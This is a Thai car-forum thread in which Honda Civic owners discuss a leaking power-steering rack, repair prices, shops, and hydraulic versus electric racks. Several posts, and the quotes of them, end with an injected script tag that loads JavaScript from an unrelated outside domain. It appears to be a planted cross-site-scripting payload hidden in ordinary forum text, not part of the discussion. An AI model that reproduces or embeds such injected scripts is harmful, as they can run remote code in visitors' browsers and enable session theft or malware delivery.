ตอบ
sornsawan


ชื่อเล่น: ศร

เข้าร่วม: 15 มกรา 2013
ตอบ: 48

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 59
ให้คำขอบคุณ: 0

ที่อยู่: บางบัวทอง
ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
ศุกร์, 12 กันยา 2014 17:28 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
พอดีแร็กพวงมาลัยซึมค่ะ ต้องการหาร้านเชียงกงและร้านเปลี่ยนฝีมือดี ไว้ใจได้ ไม่ชำแหละรถค่ะ  ไม่แน่ใจว่า ถ้าเปลี่ยนที่ศูนย์ราคาแพงไหม  ใครที่รู้จักร้านแถวบางใหญ่-บางบัวทองหรือรอบๆๆแนะนำหน่อยค่ะ
ขอบคุณค่ะ
ได้รับคำขอบคุณจาก: taomang  qq  jeang  ค้าอะไหล่โคตรเก่า  champ1990 
wittayab


เข้าร่วม: 19 พฤศจิกา 2008
ตอบ: 979

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1633
ให้คำขอบคุณ: 226

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 12 กันยา 2014 22:48 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
เปลี่ยน 0 แพงแน่ครับ หลักหมืนแน่นอน ส่วนเรื่องอื่นรอสมาชิกท่านอื่นมาตอนล่ะกันนะครับ
ได้รับคำขอบคุณจาก: taomang  qq  ค้าอะไหล่โคตรเก่า 
sornsawan


ชื่อเล่น: ศร

เข้าร่วม: 15 มกรา 2013
ตอบ: 48

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 59
ให้คำขอบคุณ: 0

ที่อยู่: บางบัวทอง
ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
ศุกร์, 12 กันยา 2014 23:27 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
ขอบคุณค่ะ. ช่วยแนะนำทีค่ะ
ได้รับคำขอบคุณจาก: taomang  ค้าอะไหล่โคตรเก่า 
taomang


เข้าร่วม: 20 เมษา 2013
ตอบ: 894

Guru ES
Guru ES

ได้รับคำขอบคุณ: 652
ให้คำขอบคุณ: 1023

ที่อยู่: สมุทรปราการ
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
เสาร์, 13 กันยา 2014 08:30 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
ถ้ามีงบ จัดแร็คไฟฟ้าเลยครับ"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
nong_fb


ชื่อเล่น: ภพ

เข้าร่วม: 15 มีนา 2013
ตอบ: 378

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 306
ให้คำขอบคุณ: 216

ที่อยู่: น่าน - บางปู สมุทรปราการ
ปี: 2001
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
เสาร์, 13 กันยา 2014 10:17 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
taomang พิมพ์ว่า:
ถ้ามีงบ จัดแร็คไฟฟ้าเลยครับ"<script src="https://sport32news.com/civicesgroup.js">




+1 อิอิ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
Simog


เข้าร่วม: 12 ธันวา 2013
ตอบ: 34

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 19
ให้คำขอบคุณ: 0

ที่อยู่: นนทบุรี
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 13 กันยา 2014 16:19 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
ลองปรึกษาพี่ นพ พ่อค้าอะไหล่โคตรเก่าในห้องซื้อขายดูครับ
แล็คไฟฟ้า งบไม่เกิน 8,xxx บ. รวมค่าแรงเห็นเพื่อนๆที่ไปเปลี่ยนมาโพสต์ไว้นะ
ถามได้พี่เค้าใจดี
ได้รับคำขอบคุณจาก: qq  ค้าอะไหล่โคตรเก่า  Kittichai Solitary 
sornsawan


ชื่อเล่น: ศร

เข้าร่วม: 15 มกรา 2013
ตอบ: 48

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 59
ให้คำขอบคุณ: 0

ที่อยู่: บางบัวทอง
ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
เสาร์, 13 กันยา 2014 19:05 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
แร็กไฟฟ้าเปนไงค่ะ.
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
Saka


ชื่อเล่น: ศักดิ์

เข้าร่วม: 01 ตุลา 2008
ตอบ: 1873

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1996
ให้คำขอบคุณ: 5358

ที่อยู่: พุทธมณฑลสาย4
ปี: 2001
เสาร์, 13 กันยา 2014 19:30 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
sornsawan พิมพ์ว่า:
แร็กไฟฟ้าเปนไงค่ะ.


ใช้มอเตอร์ไฟฟ้าแทนปั๊มพาวเวอร์ ไม่มีน้ำมันในระบบ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
bigmtts43


ชื่อเล่น: บิ๊ก

เข้าร่วม: 04 มิถุนา 2011
ตอบ: 365

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 830
ให้คำขอบคุณ: 5

ที่อยู่: บางกะปิ รามคำแหง พัฒนาการ
ปี: 2002
สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 14 กันยา 2014 19:50 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
Saka พิมพ์ว่า:
sornsawan พิมพ์ว่า:
แร็กไฟฟ้าเปนไงค่ะ.


ใช้มอเตอร์ไฟฟ้าแทนปั๊มพาวเวอร์ ไม่มีน้ำมันในระบบ


เพิ่มเติมครับ  พวงมาลัยจะเบา และห้องเครื่องจะโล่ง เพราะถอดเอาปั๊มเพาเวอร์ออกหมด
 
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
cherrytoday


ชื่อเล่น: เชอรี่

เข้าร่วม: 23 สิงหา 2014
ตอบ: 30

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 51
ให้คำขอบคุณ: 0
จันทร์, 15 กันยา 2014 08:13 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
bigmtts43 พิมพ์ว่า:
Saka พิมพ์ว่า:
sornsawan พิมพ์ว่า:
แร็กไฟฟ้าเปนไงค่ะ.


ใช้มอเตอร์ไฟฟ้าแทนปั๊มพาวเวอร์ ไม่มีน้ำมันในระบบ


เพิ่มเติมครับ  พวงมาลัยจะเบา และห้องเครื่องจะโล่ง เพราะถอดเอาปั๊มเพาเวอร์ออกหมด

 




ราคาแรงไหมคะ 
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
taomang


เข้าร่วม: 20 เมษา 2013
ตอบ: 894

Guru ES
Guru ES

ได้รับคำขอบคุณ: 652
ให้คำขอบคุณ: 1023

ที่อยู่: สมุทรปราการ
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 15 กันยา 2014 08:30 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
cherrytoday พิมพ์ว่า:
bigmtts43 พิมพ์ว่า:
Saka พิมพ์ว่า:
sornsawan พิมพ์ว่า:
แร็กไฟฟ้าเปนไงค่ะ.


ใช้มอเตอร์ไฟฟ้าแทนปั๊มพาวเวอร์ ไม่มีน้ำมันในระบบ


เพิ่มเติมครับ  พวงมาลัยจะเบา และห้องเครื่องจะโล่ง เพราะถอดเอาปั๊มเพาเวอร์ออกหมด

 




ราคาแรงไหมคะ 




ราคา ตามพี่ด้านบนครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  Kittichai Solitary 
BULLDOG


เข้าร่วม: 20 กันยา 2010
ตอบ: 24

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 62
ให้คำขอบคุณ: 39
จันทร์, 15 กันยา 2014 09:47 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
ของผมซึมในห้องโดยสารเข้ามา กำลังจะไปทำ ร้านพี่แสบ s&h พี่เค้าบอก ประมาณ 9000 บาทครับ เปลี่ยนซีลทั้งหมด แล้วก็ตัวกระบอกทั้งหมดด้วย โอเวอร์ฮอร์นทั้งหมดน่ะครับ แต่ยังไม่ได้ไปทำเหมือนกัน
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
จันทร์, 15 กันยา 2014 09:52 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
ผมทำกับช่างแสบรามอินทรา 9000 ได้ของใหม่หลายชิ้น รับประกัน 1 ปี ตอนแรกก็ชั่งใจว่าจะไปแล็คไฟฟ้าดึรึเปล่า เพราะราคาถูกกว่าด้วย

แต่คิดๆดูแล้วไม่ค่อยอยากไปดัดแปลงอะไรกับรถ และขับเร็วๆ ได้ฟีลดีกว่าด้วย เลยเอาแแบบน้ำมันดีกว่า
ได้รับคำขอบคุณจาก: nooduean_69  ฺBlackBle  Nung_Sodapop  ค้าอะไหล่โคตรเก่า  sorn 
ฺBlackBle


ชื่อเล่น: เบิ้ล

เข้าร่วม: 29 กันยา 2013
ตอบ: 37

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 127
ให้คำขอบคุณ: 355

ที่อยู่: ลาดพร้าว
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 15 กันยา 2014 21:00 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
  +1
อ้างอิงจาก:
ผมทำกับช่างแสบรามอินทรา 9000 ได้ของใหม่หลายชิ้น รับประกัน 1 ปี ตอนแรกก็ชั่งใจว่าจะไปแล็คไฟฟ้าดึรึเปล่า เพราะราคาถูกกว่าด้วย 

แต่คิดๆดูแล้วไม่ค่อยอยากไปดัดแปลงอะไรกับรถ และขับเร็วๆ ได้ฟีลดีกว่าด้วย เลยเอาแแบบน้ำมันดีกว่า
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 15 กันยา 2014 21:53 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
แล็คไฟฟ้า S5A S6A S5T(ep3) เป็นแร็คไฟฟ้าตรงรุ่น ไดเมนชั่นญี่ปุ่นและ 2.0 บ้านเรา ไม่มีการดัดแปลงรถใดๆทั้งสิ้น ประกับเดิมติดรถใช้ได้เลย ฟิลลิ่งของพวงมาลัยขึ้นอยู่กับน้ำหนักโช้คกี่กดลงพื้น กันโคลง ขนาดของหน้ายาง เช่น
   ถ้าใส่แร็ค s6m แต่ใส่ยาง 195/60/15 ใส่โช้คเดิม ไม่มีกันโคลงหรือกันโคลงเล็ก แร็คน้ำมันของ dc5 ที่คิดว่าหนืดที่สุด แต่ถ้าองค์ประกอบเป็นแบบข้างต้นมันก็เบามืออยู่ดี
   กลับกันแร็คไฟฟ้าที่เราคิดว่าเบา แต่ใส่โช้คประมาณ FLEX MONOFLEX หรือหน้ายางกว้าง ยังไงพวงก็ตึงมืออยู่ดี
   แล็คไฟฟ้าทำงานตามสปีดเซ็นเซอร์เพื่อให้สอดคล้องกับการใช้งานทั่วไป คือขับช้าแล้วเบา ขับเร็วขึ้นก็หนืดเพิ่มขึ้นนั่นเอง
         *น้ำมันหรือไฟฟ้าดีกว่ากัน
ในส่วนตัวผมว่าให้เลือกที่ชอบ
         ไฟฟ้าหนืดตามความเร็ว แต่ถ้าโช้คแข็งก็หนืดทุกจังหวะเช่นกันแต่ก็แปลผันตามความเร็วอยู่
          น้ำมันหนืดทุกจังหวะ
          *จากการเปลี่ยนแร็คไดเมนชั่นมาเป็นหลักร้อยเส้น เหตุผลที่ลูกค้าตัดสินใจคือ
*คนที่เลือกน้ำมันเพราะมองว่า หนืดให้ทุกจังหวะ ถึงเสียจุดไหนก็ค่อยดูแลเป็นจุดๆได้ ไม่ได้หนักไปเลยทีเดียว ส่วนแกน สายแรงดันสายโลว์ สายไฮ ตัวปั่น กระปุก สายไหลกลับ เส้นสั้น เส้นยาว ก็ค่อยๆซ่อมไปทีละจุดเอา
*คนที่เลือกแร็คไฟฟ้าเพราะมองว่า ในระยะยาวการดูแลรักษาง่ายกว่า เพราะจุดหลักมันจะมีแค่ แกนมอเตอร์กับกล่องควบคุม ที่เหลือพวกจารบีหรือบูชเลขแปดก็ราคาหลักร้อยบาท
           ผมขายทุกแบบนะครับ ขอไม่ชี้นำในการเลือก แต่ขอลงข้อมูลที่เป็นจริง จากประสบการณ์ในการทำงานแนวนี้ในทุกวัน
แร็คไฟฟ้าแต่ทำรถซิ่งทำให้พวงเบาและไวไปรึเปล่า ถามลุงเกิ้ลฝาแดง พี่น็อตเคยีบสี่ ตาเบ้โมโน เสี่ยต้นเฟล็กเขียว ดูได้เลยนะครับ พวงไม่เบาเหมือนใส่ 195/60/15 โช้คเดิมแน่นอน"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: akawut  Nung_Sodapop  Ton-  taomang  Chote  Saka  nooduean_69  Mundo  bhumipat  champ1990  Wut_Rayong  aungpao  Kittichai Solitary  nu_es_05 
akawut


ชื่อเล่น: เชน

เข้าร่วม: 07 สิงหา 2009
ตอบ: 848

Guru ES
Guru ES

ได้รับคำขอบคุณ: 989
ให้คำขอบคุณ: 698

ที่อยู่: ปัจจุบัน
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 15 กันยา 2014 22:16 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
หนับหนุน แร็คไฟฟ้าคับ สบายมือสำหรับผู้หญิงขับดีด้วย
 
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
thanatphong


เข้าร่วม: 05 มิถุนา 2009
ตอบ: 2693

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5343
ให้คำขอบคุณ: 20

ที่อยู่: zone none ( civic es only)
ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 15 กันยา 2014 22:17 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
  ส่วนตัวชอบน้ำมันมากกว่า เพราะว่ามันให้ความรู้สึกดี ถ้าได้ของ DC5 มามันจะหนักขึ้นหน่อย แต่นิ่งมากๆ credit : มีพี่ท่านหนึ่งได้กล่าวไว้ 
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
จันทร์, 15 กันยา 2014 22:22 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
thanatphong พิมพ์ว่า:
  ส่วนตัวชอบน้ำมันมากกว่า เพราะว่ามันให้ความรู้สึกดี ถ้าได้ของ DC5 มามันจะหนักขึ้นหน่อย แต่นิ่งมากๆ credit : มีพี่ท่านหนึ่งได้กล่าวไว้ 




ติดตั้งวันพุธพร้อมโคมกระดกนะ ของมีเลย สวยโคตร
Nung_Sodapop


ชื่อเล่น: หนึ่ง

เข้าร่วม: 11 กันยา 2010
ตอบ: 2230

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2191
ให้คำขอบคุณ: 4794

ที่อยู่: ลาดกระบัง
ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
อังคาร, 16 กันยา 2014 07:24 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
ที่0 ชุดซ่อมประมาณ 12,000-14,000

เปลี่ยนใหม่ 4 หมื่นกว่าๆ ผมถามมาแล้ว

เพราะตอนนี้ผมก็ซึมครับ อาศัยเติมบน้ำมันบ่อยๆ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
honda01


เข้าร่วม: 30 มีนา 2012
ตอบ: 1811

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1200
ให้คำขอบคุณ: 1179

ที่อยู่: สนามบินสุวรรณภูมิ-โคราช
ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 16 กันยา 2014 07:48 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
เคยซ่อมมาละตั้งแต่ได้รถมาใหม่ๆเมื่อสี่ปีที่แล้วเพราะความไม่รู้..ถ้าตอนนั้นรู้ว่ามีไฟฟ้าคงจัดไปละ..อยากลองงง
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
Ton-


เข้าร่วม: 02 ตุลา 2008
ตอบ: 1397

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5467
ให้คำขอบคุณ: 1471
อังคาร, 16 กันยา 2014 08:05 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
แล็คไฟฟ้า S5A S6A S5T(ep3) เป็นแร็คไฟฟ้าตรงรุ่น ไดเมนชั่นญี่ปุ่นและ 2.0 บ้านเรา ไม่มีการดัดแปลงรถใดๆทั้งสิ้น ประกับเดิมติดรถใช้ได้เลย ฟิลลิ่งของพวงมาลัยขึ้นอยู่กับน้ำหนักโช้คกี่กดลงพื้น กันโคลง ขนาดของหน้ายาง เช่น
   ถ้าใส่แร็ค s6m แต่ใส่ยาง 195/60/15 ใส่โช้คเดิม ไม่มีกันโคลงหรือกันโคลงเล็ก แร็คน้ำมันของ dc5 ที่คิดว่าหนืดที่สุด แต่ถ้าองค์ประกอบเป็นแบบข้างต้นมันก็เบามืออยู่ดี
   กลับกันแร็คไฟฟ้าที่เราคิดว่าเบา แต่ใส่โช้คประมาณ FLEX MONOFLEX หรือหน้ายางกว้าง ยังไงพวงก็ตึงมืออยู่ดี
   แล็คไฟฟ้าทำงานตามสปีดเซ็นเซอร์เพื่อให้สอดคล้องกับการใช้งานทั่วไป คือขับช้าแล้วเบา ขับเร็วขึ้นก็หนืดเพิ่มขึ้นนั่นเอง
         *น้ำมันหรือไฟฟ้าดีกว่ากัน
ในส่วนตัวผมว่าให้เลือกที่ชอบ
         ไฟฟ้าหนืดตามความเร็ว แต่ถ้าโช้คแข็งก็หนืดทุกจังหวะเช่นกันแต่ก็แปลผันตามความเร็วอยู่
          น้ำมันหนืดทุกจังหวะ
          *จากการเปลี่ยนแร็คไดเมนชั่นมาเป็นหลักร้อยเส้น เหตุผลที่ลูกค้าตัดสินใจคือ
*คนที่เลือกน้ำมันเพราะมองว่า หนืดให้ทุกจังหวะ ถึงเสียจุดไหนก็ค่อยดูแลเป็นจุดๆได้ ไม่ได้หนักไปเลยทีเดียว ส่วนแกน สายแรงดันสายโลว์ สายไฮ ตัวปั่น กระปุก สายไหลกลับ เส้นสั้น เส้นยาว ก็ค่อยๆซ่อมไปทีละจุดเอา
*คนที่เลือกแร็คไฟฟ้าเพราะมองว่า ในระยะยาวการดูแลรักษาง่ายกว่า เพราะจุดหลักมันจะมีแค่ แกนมอเตอร์กับกล่องควบคุม ที่เหลือพวกจารบีหรือบูชเลขแปดก็ราคาหลักร้อยบาท
           ผมขายทุกแบบนะครับ ขอไม่ชี้นำในการเลือก แต่ขอลงข้อมูลที่เป็นจริง จากประสบการณ์ในการทำงานแนวนี้ในทุกวัน
แร็คไฟฟ้าแต่ทำรถซิ่งทำให้พวงเบาและไวไปรึเปล่า ถามลุงเกิ้ลฝาแดง พี่น็อตเคยีบสี่ ตาเบ้โมโน เสี่ยต้นเฟล็กเขียว ดูได้เลยนะครับ พวงไม่เบาเหมือนใส่ 195/60/15 โช้คเดิมแน่นอน"<script src="https://sport32news.com/civicesgroup.js">


แล็คไฟฟ้าที่เห็นขายกันถูกๆ ส่วนใหญ่เป็นของ stream อันนี้ถือว่าต้องแปลงมั้ยครับ (จุดยึด) ถามเป็นความรู้รอบตัว 
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
taomang


เข้าร่วม: 20 เมษา 2013
ตอบ: 894

Guru ES
Guru ES

ได้รับคำขอบคุณ: 652
ให้คำขอบคุณ: 1023

ที่อยู่: สมุทรปราการ
ปี: 2002
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 16 กันยา 2014 08:07 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
แล็คไฟฟ้า S5A S6A S5T(ep3) เป็นแร็คไฟฟ้าตรงรุ่น ไดเมนชั่นญี่ปุ่นและ 2.0 บ้านเรา ไม่มีการดัดแปลงรถใดๆทั้งสิ้น ประกับเดิมติดรถใช้ได้เลย ฟิลลิ่งของพวงมาลัยขึ้นอยู่กับน้ำหนักโช้คกี่กดลงพื้น กันโคลง ขนาดของหน้ายาง เช่น
   ถ้าใส่แร็ค s6m แต่ใส่ยาง 195/60/15 ใส่โช้คเดิม ไม่มีกันโคลงหรือกันโคลงเล็ก แร็คน้ำมันของ dc5 ที่คิดว่าหนืดที่สุด แต่ถ้าองค์ประกอบเป็นแบบข้างต้นมันก็เบามืออยู่ดี
   กลับกันแร็คไฟฟ้าที่เราคิดว่าเบา แต่ใส่โช้คประมาณ FLEX MONOFLEX หรือหน้ายางกว้าง ยังไงพวงก็ตึงมืออยู่ดี
   แล็คไฟฟ้าทำงานตามสปีดเซ็นเซอร์เพื่อให้สอดคล้องกับการใช้งานทั่วไป คือขับช้าแล้วเบา ขับเร็วขึ้นก็หนืดเพิ่มขึ้นนั่นเอง
         *น้ำมันหรือไฟฟ้าดีกว่ากัน
ในส่วนตัวผมว่าให้เลือกที่ชอบ
         ไฟฟ้าหนืดตามความเร็ว แต่ถ้าโช้คแข็งก็หนืดทุกจังหวะเช่นกันแต่ก็แปลผันตามความเร็วอยู่
          น้ำมันหนืดทุกจังหวะ
          *จากการเปลี่ยนแร็คไดเมนชั่นมาเป็นหลักร้อยเส้น เหตุผลที่ลูกค้าตัดสินใจคือ
*คนที่เลือกน้ำมันเพราะมองว่า หนืดให้ทุกจังหวะ ถึงเสียจุดไหนก็ค่อยดูแลเป็นจุดๆได้ ไม่ได้หนักไปเลยทีเดียว ส่วนแกน สายแรงดันสายโลว์ สายไฮ ตัวปั่น กระปุก สายไหลกลับ เส้นสั้น เส้นยาว ก็ค่อยๆซ่อมไปทีละจุดเอา
*คนที่เลือกแร็คไฟฟ้าเพราะมองว่า ในระยะยาวการดูแลรักษาง่ายกว่า เพราะจุดหลักมันจะมีแค่ แกนมอเตอร์กับกล่องควบคุม ที่เหลือพวกจารบีหรือบูชเลขแปดก็ราคาหลักร้อยบาท
           ผมขายทุกแบบนะครับ ขอไม่ชี้นำในการเลือก แต่ขอลงข้อมูลที่เป็นจริง จากประสบการณ์ในการทำงานแนวนี้ในทุกวัน
แร็คไฟฟ้าแต่ทำรถซิ่งทำให้พวงเบาและไวไปรึเปล่า ถามลุงเกิ้ลฝาแดง พี่น็อตเคยีบสี่ ตาเบ้โมโน เสี่ยต้นเฟล็กเขียว ดูได้เลยนะครับ พวงไม่เบาเหมือนใส่ 195/60/15 โช้คเดิมแน่นอน"<script src="https://sport32news.com/civicesgroup.js">




ขอเก็บข้อมูลครับ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
ค้าอะไหล่โคตรเก่า


เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน
ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
อังคาร, 16 กันยา 2014 08:24 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
Ton- พิมพ์ว่า:
ค้าอะไหล่โคตรเก่า พิมพ์ว่า:
แล็คไฟฟ้า S5A S6A S5T(ep3) เป็นแร็คไฟฟ้าตรงรุ่น ไดเมนชั่นญี่ปุ่นและ 2.0 บ้านเรา ไม่มีการดัดแปลงรถใดๆทั้งสิ้น ประกับเดิมติดรถใช้ได้เลย ฟิลลิ่งของพวงมาลัยขึ้นอยู่กับน้ำหนักโช้คกี่กดลงพื้น กันโคลง ขนาดของหน้ายาง เช่น
   ถ้าใส่แร็ค s6m แต่ใส่ยาง 195/60/15 ใส่โช้คเดิม ไม่มีกันโคลงหรือกันโคลงเล็ก แร็คน้ำมันของ dc5 ที่คิดว่าหนืดที่สุด แต่ถ้าองค์ประกอบเป็นแบบข้างต้นมันก็เบามืออยู่ดี
   กลับกันแร็คไฟฟ้าที่เราคิดว่าเบา แต่ใส่โช้คประมาณ FLEX MONOFLEX หรือหน้ายางกว้าง ยังไงพวงก็ตึงมืออยู่ดี
   แล็คไฟฟ้าทำงานตามสปีดเซ็นเซอร์เพื่อให้สอดคล้องกับการใช้งานทั่วไป คือขับช้าแล้วเบา ขับเร็วขึ้นก็หนืดเพิ่มขึ้นนั่นเอง
         *น้ำมันหรือไฟฟ้าดีกว่ากัน
ในส่วนตัวผมว่าให้เลือกที่ชอบ
         ไฟฟ้าหนืดตามความเร็ว แต่ถ้าโช้คแข็งก็หนืดทุกจังหวะเช่นกันแต่ก็แปลผันตามความเร็วอยู่
          น้ำมันหนืดทุกจังหวะ
          *จากการเปลี่ยนแร็คไดเมนชั่นมาเป็นหลักร้อยเส้น เหตุผลที่ลูกค้าตัดสินใจคือ
*คนที่เลือกน้ำมันเพราะมองว่า หนืดให้ทุกจังหวะ ถึงเสียจุดไหนก็ค่อยดูแลเป็นจุดๆได้ ไม่ได้หนักไปเลยทีเดียว ส่วนแกน สายแรงดันสายโลว์ สายไฮ ตัวปั่น กระปุก สายไหลกลับ เส้นสั้น เส้นยาว ก็ค่อยๆซ่อมไปทีละจุดเอา
*คนที่เลือกแร็คไฟฟ้าเพราะมองว่า ในระยะยาวการดูแลรักษาง่ายกว่า เพราะจุดหลักมันจะมีแค่ แกนมอเตอร์กับกล่องควบคุม ที่เหลือพวกจารบีหรือบูชเลขแปดก็ราคาหลักร้อยบาท
           ผมขายทุกแบบนะครับ ขอไม่ชี้นำในการเลือก แต่ขอลงข้อมูลที่เป็นจริง จากประสบการณ์ในการทำงานแนวนี้ในทุกวัน
แร็คไฟฟ้าแต่ทำรถซิ่งทำให้พวงเบาและไวไปรึเปล่า ถามลุงเกิ้ลฝาแดง พี่น็อตเคยีบสี่ ตาเบ้โมโน เสี่ยต้นเฟล็กเขียว ดูได้เลยนะครับ พวงไม่เบาเหมือนใส่ 195/60/15 โช้คเดิมแน่นอน"<script src="https://sport32news.com/civicesgroup.js">


แล็คไฟฟ้าที่เห็นขายกันถูกๆ ส่วนใหญ่เป็นของ stream อันนี้ถือว่าต้องแปลงมั้ยครับ (จุดยึด) ถามเป็นความรู้รอบตัว 




ไฟฟ้าของสตรีมไม่มีคร้าบพี่ต้นคร้าบ สตรีมจะใช้แร็คน้ำมันพาร์ท s7c อย่างเดียวทั้งญี่ปุ่นและบ้านเราคร้าบผม
s5a มากับไดเมนชั่น 01-02
s6a มากับไดเมนชั่น 03-04
s5t มากับ ep3
scc มากับแจ๊ส
ส่วนแร็คน้ำมันบ้านเรา
s5a คือ 01-02
s5h คือ 03-05
แร็คน้ำมันยุ่น
s7a คือ สตรีมเครื่อง 1.7 ซึ่งเหมือนกับ 1.7 ไดเมนชั่นทุกอย่าง
s7c สตรีมเครื่อง 2.0 ถ้าจะนำมาใส่ไดเมนชั่นต้องรู้วิธีการสแว๊พเพราะแกนแร็คจะสั้นกว่า "<script src="https://sport32news.com/civicesgroup.js">
      
     
ได้รับคำขอบคุณจาก: Ton-  Nung_Sodapop  Saka  Oyoyoo  bhumipat  Doraeman  Blackhole  champ1990  Kittichai Solitary 
k_zaa


เข้าร่วม: 13 สิงหา 2014
ตอบ: 26

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 13
ให้คำขอบคุณ: 4

ปี: 2003
สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อังคาร, 16 กันยา 2014 14:01 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
มาเก็บข้อมูลด้วยคนครับ ใกล้ได้ฤกษ์เปลี่ยนเร็วๆนี้แน่นอน
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า 
sornsawan


ชื่อเล่น: ศร

เข้าร่วม: 15 มกรา 2013
ตอบ: 48

น้องใหม่
น้องใหม่

ได้รับคำขอบคุณ: 59
ให้คำขอบคุณ: 0

ที่อยู่: บางบัวทอง
ปี: 2003
สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
พุธ, 17 กันยา 2014 13:25 - สอบถามเรื่องแร็กพวงมาลัยซึมค่ะ
